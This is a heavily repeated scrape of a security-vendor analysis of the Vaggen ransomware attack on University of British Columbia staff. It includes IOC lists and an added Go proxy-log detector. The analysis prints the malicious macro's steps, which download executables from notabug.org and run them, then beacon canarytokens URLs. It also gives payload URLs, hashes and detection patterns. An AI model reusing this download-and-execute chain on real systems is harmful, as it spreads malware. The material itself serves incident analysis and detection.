3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3377 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. 
Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3378 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3379 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3380 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3381 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM 
Tag
The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.
With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.
Unusually low ransom amount
Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.
However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point whether the University of British Columbia was the sole target.
Crawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.
We are grateful for the information shared with us by the University of British Columbia. This allowed us to paint a better picture of this attack and understand who the targets were.
Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.
IOCs
Variant1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe
Variant2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f
Variant3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp
Variant4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe
Variant5:
template.dotm:
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
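The network indicators in the IOC list fall into two groups: notabug[.]org "raw/master" repository paths from which the macro fetches its executables, and canarytokens[.]com paths it requests afterwards to report success or failure. The Go program below is an added example, not code from the article or from Malwarebytes, that correlates those two groups in a web-proxy log: a canarytokens.com request from a client that fetched a raw .exe from notabug.org shortly before is raised as high severity, and a hit on one of the exact canary URLs from the list with no preceding download as medium. The "<RFC3339 time> <client> <url>" log format, the client names and the timestamps are constructed for the example; the URLs are the ones listed above.

```go
package main

import (
	"fmt"
	"strings"
	"time"
)

// proxyEvent is one parsed web-proxy log line. The "<RFC3339 time> <client> <url>"
// layout is constructed for this example, not taken from the article.
type proxyEvent struct {
	when   time.Time
	client string
	url    string
}

type alert struct {
	severity string // "high" or "medium"
	client   string
	reason   string
}

// Exact canary URLs from the IOC list (defanging brackets removed, no scheme).
var knownCanaryURLs = []string{
	"canarytokens.com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html",
	"canarytokens.com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html",
	"canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp",
	"canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html",
	"canarytokens.com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php",
	"canarytokens.com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp",
	"canarytokens.com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp",
	"canarytokens.com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php",
}

func parseLine(line string) (proxyEvent, error) {
	f := strings.Fields(line)
	if len(f) != 3 {
		return proxyEvent{}, fmt.Errorf("malformed proxy line: %q", line)
	}
	t, err := time.Parse(time.RFC3339, f[0])
	if err != nil {
		return proxyEvent{}, err
	}
	return proxyEvent{when: t, client: f[1], url: f[2]}, nil
}

// normalize lowercases and strips the scheme so log URLs compare as host+path.
func normalize(u string) string {
	u = strings.ToLower(u)
	u = strings.TrimPrefix(u, "https://")
	return strings.TrimPrefix(u, "http://")
}

// isRawExeDownload matches the staging pattern shared by all five variants:
// an .exe fetched from a notabug.org repository "raw/master" path.
func isRawExeDownload(u string) bool {
	u = normalize(u)
	return strings.HasPrefix(u, "notabug.org/") &&
		strings.Contains(u, "/raw/master/") && strings.HasSuffix(u, ".exe")
}

func isCanaryBeacon(u string) bool { return strings.HasPrefix(normalize(u), "canarytokens.com/") }

func isKnownCanary(u string) bool {
	u = normalize(u)
	for _, k := range knownCanaryURLs {
		if u == k {
			return true
		}
	}
	return false
}

// detect walks the log in time order. high: a canarytokens.com request from a client
// that fetched a raw .exe from notabug.org within `window` before it (the macro's
// download-then-report sequence). medium: a request to an exact canary URL from the
// IOC list with no preceding download seen (for example the macro reporting failure).
func detect(lines []string, window time.Duration) ([]alert, error) {
	lastDownload := map[string]time.Time{}
	var alerts []alert
	for _, ln := range lines {
		ev, err := parseLine(ln)
		if err != nil {
			return nil, err
		}
		switch {
		case isRawExeDownload(ev.url):
			lastDownload[ev.client] = ev.when
		case isCanaryBeacon(ev.url):
			if t, ok := lastDownload[ev.client]; ok && ev.when.Sub(t) <= window {
				alerts = append(alerts, alert{"high", ev.client, "raw .exe from notabug.org followed by canarytokens.com beacon"})
			} else if isKnownCanary(ev.url) {
				alerts = append(alerts, alert{"medium", ev.client, "request to a canary URL from the IOC list"})
			}
		}
	}
	return alerts, nil
}

// sampleLog is constructed test data; the URLs are the Variant2 indicators.
var sampleLog = []string{
	"2020-10-20T14:02:11Z ws-0417 https://notabug.org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe",
	"2020-10-20T14:02:12Z ws-0417 https://notabug.org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe",
	"2020-10-20T14:02:15Z ws-0417 http://canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp",
	"2020-10-20T14:05:40Z ws-0102 http://canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html",
	"2020-10-20T15:10:00Z ws-0233 https://www.example.com/index.html",
}

func main() {
	alerts, err := detect(sampleLog, 5*time.Minute)
	if err != nil {
		panic(err)
	}
	for _, a := range alerts {
		fmt.Printf("%-6s %s: %s\n", a.severity, a.client, a.reason)
	}
}
```

The download pattern is matched structurally (host, "raw/master" path, .exe suffix) rather than by exact URL, since the same pattern recurs across all five variants with different repository names, while the canary URLs are matched exactly because each token is unique to the actor.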
When the macro is executed, it does the following:
Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the Shell function to execute killar.exe
Checks the return value of the Shell function to see whether it was successful (the return value would be the task ID of the executed application)
If successful, it sends an HTTP GET request to:
canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If it isn’t successful, it sends an HTTP GET request to:
canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.
Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted about a particular event.
This can be very useful as an early warning system that an intruder has had access to a network. In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.
Vaggen ransomware
After being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.
The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.
Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.
main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen
A full list of the functions, along with their RVAs, can be found here.
Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.
Encrypting and renaming of the files is implemented as the callback of the standard Go library function path/filepath.Walk.
Files are encrypted with AES-256 (32-byte key) in GCM mode.
The encryption algorithm is similar to the one demonstrated here. It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.
The content of the output file (with .VAGGEN extension) contains:
the 12-byte nonce
the encrypted content
the 16-byte GCM tag
The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3427 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3428 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3429 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3430 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3431 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3432 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3433 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3434 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3435 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3436 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3437 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3438 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3439 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3440 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3441 of 
